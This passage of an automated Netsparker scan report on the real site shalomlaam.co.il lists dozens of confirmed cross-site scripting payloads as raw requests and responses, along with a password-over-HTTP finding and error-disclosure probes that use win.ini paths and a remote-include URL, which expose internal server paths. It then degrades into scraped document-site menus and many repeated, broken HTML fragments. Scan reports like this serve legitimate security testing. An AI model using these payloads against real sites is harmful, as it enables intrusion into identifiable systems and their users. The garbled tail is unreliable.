http://www.shalomlaam.co.il/site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
<script>alert(0x0002AE)</script>
Request
GET /site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AE)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:29 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/etz_haim/'"--></style></script><script>netsparker(0x0002AE)</script><BR>script><BR>style><<script>netsparker(0x0002AE)<.asp?id=script>
83 / 146
3.133. /gvideo/js/swfaddress.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..
Parameters
Request
GET /gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000445)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:39 GMT
Content-Length: 183
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/js/swfaddress.js'"--></style></script><script>netsparker(0x000445)</script><BR>script><BR>style><<script>netsparker(0x000445)<.asp?id=script>
3.134. /site/bmidrash/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
<script>alert(0x0002AD)</script>
Request
GET /site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AD)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:28 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/bmidrash/'"--></style></script><script>netsparker(0x0002AD)</script><BR>script><BR>style><<script>netsparker(0x0002AD)<.asp?id=script>
84 / 146
http://www.shalomlaam.co.il/ask/
Parameters
action POST search
search POST '"--></style></script>
subject POST 0
Request
POST /ask/ HTTP/1.1
Content-Length: 90
action=search&search='"--></style></script><script>netsparker(0x0005D6)</script>&subject=0
Response
<input name="search" type="text" id="search" onFocus="if(this.value==' ') this.value='';" onBlur="if(this.value=='') this.value=' ';" value="'"--></style></script>
<script>netsparker(0x0005D6)</script>" />
</td>
<td bgcolor="#FEF4D3"> </td>
<td width="131" bgcolor="#FEF4D3"><select name="subject" dir="rtl" class
3.136. /contact/search/ CONFIRMED

http://www.shalomlaam.co.il/contact/search/?'"--></style></script><script>alert(0x0004AC)</script>
Parameters
<script>alert(0x0004AC)</script>
Request
GET /contact/search/?'"--></style></script><script>netsparker(0x0004AC)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:23 GMT
Content-Length: 176
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/search/?'"--></style></script><script>netsparker(0x0004AC)</script><BR>script><BR>style><<script>netsparker(0x0004AC)<.asp?id=script>
3.137. /js/top1.htm CONFIRMED
http://www.shalomlaam.co.il/js/top1.htm?'"--></style></script><script>alert(0x0003C9)</script>
Parameters
85 / 146
Request
GET /js/top1.htm?'"--></style></script><script>netsparker(0x0003C9)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:27 GMT
Content-Length: 172
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/top1.htm?'"--></style></script><script>netsparker(0x0003C9)</script><BR>script><BR>style><<script>netsparker(0x0003C9)<.asp?id=script>
3.138. /Branches/snif.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
id GET 61
Request
GET /Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000204)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:26 GMT
Content-Length: 177
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/Branches/snif.asp'"--></style></script><script>netsparker(0x000204)</script><BR>script><BR>style><<script>netsparker(0x000204)<.asp?id=script>
3.139. /site/bmidrash/mekorot.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
id GET 1087
Request
GET /site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000386)%3C/script%3E HTTP/1.1
86 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:59:58 GMT
Content-Length: 185
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/bmidrash/mekorot.asp'"--></style></script><script>netsparker(0x000386)</script><BR>script><BR>style><<script>netsparker(0x000386)<.asp?id=script>
3.140. /site/gallery/highslide/highslide-full.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%..
Parameters
Request
GET /site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001C4)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:48 GMT
Content-Length: 200
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/highslide-full.js'"--></style></script><script>netsparker(0x0001C4)</script><BR>script><BR>style><<script>netsparker(0x0001C4)
<.asp?id=script>
3.141. /about/search/default.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
q GET 3
Request
GET /about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055A)%3C/script%3E HTTP/1.1
87 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:23 GMT
Content-Length: 184
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/search/default.asp'"--></style></script><script>netsparker(0x00055A)</script><BR>script><BR>style><<script>netsparker(0x00055A)<.asp?id=script>
3.142. /js/HebDate.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E..
Parameters
Request
GET /js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E5)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:43:56 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/HebDate.js'"--></style></script><script>netsparker(0x0000E5)</script><BR>script><BR>style><<script>netsparker(0x0000E5)<.asp?id=script>
3.143. /pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/..
Parameters
Request
GET /pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00045B)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:46 GMT
Content-Length: 167
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/pitgam/'"--></style></script><script>netsparker(0x00045B)</script><BR>script><BR>style><<script>netsparker(0x00045B)<.asp?id=script>
88 / 146
3.144. /banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/..
Parameters
Request
GET /banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057B)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:35 GMT
Content-Length: 167
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/banner/'"--></style></script><script>netsparker(0x00057B)</script><BR>script><BR>style><<script>netsparker(0x00057B)<.asp?id=script>
3.145. /site/gallery/highslide/highslide.css'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3..
Parameters
Request
GET /site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000123)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:21 GMT
Content-Length: 196
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/highslide.css'"--></style></script><script>netsparker(0x000123)</script><BR>script><BR>style><<script>netsparker(0x000123)<.asp?
id=script>
3.146. /js/images/ CONFIRMED
http://www.shalomlaam.co.il/js/images/?'"--></style></script><script>alert(0x00040E)</script>
Parameters
89 / 146
Request
GET /js/images/?'"--></style></script><script>netsparker(0x00040E)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:56 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/images/?'"--></style></script><script>netsparker(0x00040E)</script><BR>script><BR>style><<script>netsparker(0x00040E)<.asp?id=script>
3.147. /reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/scr..
Parameters
Request
GET /reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B9)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:30 GMT
Content-Length: 164
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/reg/'"--></style></script><script>netsparker(0x0001B9)</script><BR>script><BR>style><<script>netsparker(0x0001B9)<.asp?id=script>
3.148. /site/ask/answer.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
id GET 207
Request
GET /site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000302)%3C/script%3E HTTP/1.1
90 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:57:21 GMT
Content-Length: 179
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/ask/answer.asp'"--></style></script><script>netsparker(0x000302)</script><BR>script><BR>style><<script>netsparker(0x000302)<.asp?id=script>
3.149. /site/ask/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3..
Parameters
Request
GET /site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000298)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:15 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/ask/'"--></style></script><script>netsparker(0x000298)</script><BR>script><BR>style><<script>netsparker(0x000298)<.asp?id=script>
3.150. /site/reg/login.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000283)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:55:58 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/reg/login.asp'"--></style></script><script>netsparker(0x000283)</script><BR>script><BR>style><<script>netsparker(0x000283)<.asp?id=script>
91 / 146
1 TOTAL
IMPORTANT
CONFIRMED
1
4. Password Transmitted Over HTTP
Netsparker identified that password data is sent over HTTP. {PRODUCT} detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user
input, starting from the login process, should only be served over HTTPS.
Classification
4.1. /reg/login.asp CONFIRMED
http://www.shalomlaam.co.il/reg/login.asp?id=0
Form target action
mshtml.HTMLInputElementClass
Request
GET /reg/login.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/reg/login.asp
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:37 GMT
Content-Length: 33739
Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=windows-1255">
<link rel="shortcut icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<title> - </title>
<meta name="Keywords"
content=',,,,,,,,,,,,,,,,,,,,,,,,,,'>
<meta name="Description" CONTENT=", , , ' '. . ' '
: , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>

<script language="javascript" src="/js/HebDate.js"></script>
<script type="text/javascript">

<source src="http://lavishilo.org/temp/54.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
</td></tr><tr>
<Td dir="rtl" valign=
19.4. /pitgam/
http://www.shalomlaam.co.il/pitgam/?CatID=%2527
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp
Certainty
Request
GET /pitgam/?CatID=%2527 HTTP/1.1
Referer: http://www.shalomlaam.co.il/pitgam/?nsextt=NSFTW
Response
Date: Tue, 20 May 2014 14:35:18 GMT
Content-Length: 310
Pragma: no-cache
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
141 / 146
19.5. /ask/
http://www.shalomlaam.co.il/ask/?CatID=%2527&page=2
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ASK\../pagetop.asp
Certainty
Request
GET /ask/?CatID=%2527&page=2 HTTP/1.1
Response
Date: Tue, 20 May 2014 14:04:42 GMT
Content-Length: 345
Pragma: no-cache
<title> - </title>
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ASK\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.6. /alon/list.asp
http://www.shalomlaam.co.il/alon/list.asp?id=0&CatID=%27
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp
Certainty
Request
GET /alon/list.asp?id=0&CatID=%27 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/alon/list.asp?CatID=460
Response
Date: Tue, 20 May 2014 13:57:42 GMT
Content-Length: 308
Pragma: no-cache
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.7. /gallery/
http://www.shalomlaam.co.il/gallery/?page=%2527
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp
Certainty
142 / 146
Request
GET /gallery/?page=%2527 HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/
Response
Date: Tue, 20 May 2014 14:10:54 GMT
Content-Length: 310
Pragma: no-cache
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'Cint'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp</font><font face="Arial" size=2>, line 86</font>
19.8. /gallery/branches.asp
http://www.shalomlaam.co.il/gallery/branches.asp?id=c%3a%5cwindows%5cwin.ini
c:\windows\win.ini&quot
Certainty
Request
GET /gallery/branches.asp?id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Referer: http://www.shalomlaam.co.il/Branches/snif.asp?id=28
Response
" align="center"><tr>
"c:\windows\win.ini"]'</font><p><font face="Arial" size=2>/gallery/branches.asp</font><font face="Arial" size=2>, line 90</font>
19.9. /pitgam/Default.asp
http://www.shalomlaam.co.il/pitgam/Default.asp?id=0&CatID=%27
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp
Certainty
Request
GET /pitgam/Default.asp?id=0&CatID=%27 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/pitgam/?CatID=459
Response
Date: Tue, 20 May 2014 13:56:31 GMT
Content-Length: 310
Pragma: no-cache
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.10. /sipur/page.asp
http://www.shalomlaam.co.il/sipur/page.asp?CatId=
143 / 146
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp
Certainty
Request
GET /sipur/page.asp?CatId= HTTP/1.1
Response
Date: Tue, 20 May 2014 13:46:50 GMT
Content-Length: 309
Pragma: no-cache
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.11. /alon/mador.asp
http://www.shalomlaam.co.il/alon/mador.asp?CatId=%2527
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp
Certainty
Request
GET /alon/mador.asp?CatId=%2527 HTTP/1.1
Response
Date: Tue, 20 May 2014 14:09:01 GMT
Content-Length: 308
Pragma: no-cache
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.12. /gallery/Default.asp
http://www.shalomlaam.co.il/gallery/Default.asp?id=0&page=hTTp%3a%2f%2fnetsparker.com%2fn
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp
Certainty
Request
GET /gallery/Default.asp?id=0&page=hTTp%3a%2f%2fnetsparker.com%2fn HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/Default.asp?id=0
144 / 146
Response
Date: Tue, 20 May 2014 14:16:50 GMT
Content-Length: 310
Pragma: no-cache
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'Cint'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp</font><font face="Arial" size=2>, line 86</font>
http://www.shalomlaam.co.il/ask/answer.asp?id=c%3a%5cwindows%5cwin.ini
Certainty
Request
GET /ask/answer.asp?id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Response
</style>
</head>
"c:\windows\win.ini"]'</font><p><font face="Arial" size=2>/ask/answer.asp</font><font face="Arial" size=2>, line 12</font>
19.14. /sipur/
http://www.shalomlaam.co.il/sipur/?CatID=%2527&page=2
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp
Certainty
Request
GET /sipur/?CatID=%2527&page=2 HTTP/1.1
Response
Date: Tue, 20 May 2014 14:18:59 GMT
Content-Length: 359
Pragma: no-cache
<title> - - </title>
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.15. /site/ask/answer_print.asp
http://www.shalomlaam.co.il/site/ask/answer_print.asp?tbl=ask&id=c%3a%5cwindows%5cwin.ini
Certainty
145 / 146
Request
GET /site/ask/answer_print.asp?tbl=ask&id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Referer: http://www.shalomlaam.co.il/vod/vod.asp?id=1762
Response
0"> </td>
</tr> <font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: '[string:
"c:\windows\win.ini"]'</font><p><font face="Arial" size=2>/site/ask/answer_print.asp</font><font face="Arial" size=2>, line 4</font>
146 / 146

WWW - Shalomlaam.co - Il 801

Enviado por

Dados do documento

Descrição original:

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

WWW - Shalomlaam.co - Il 801

Enviado por

Direitos autorais:

Formatos disponíveis

NETSPARKER SCAN REPORT SUMMARY

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

yle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;"></td></tr></table><br><br></td></tr></table>

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

3.128. /contact/reg/ CONFIRMED

3.136. /contact/search/ CONFIRMED

<table width="800" border="0" cellspacing="0" cellpadding="0">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

TENT=" (2010), . ">

'. . ' ' : , ">

TENT=" (2010), . ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

e="Description" CONTENT=" ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

e="Description" CONTENT=" ">

icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">

'. . ' ' : , ">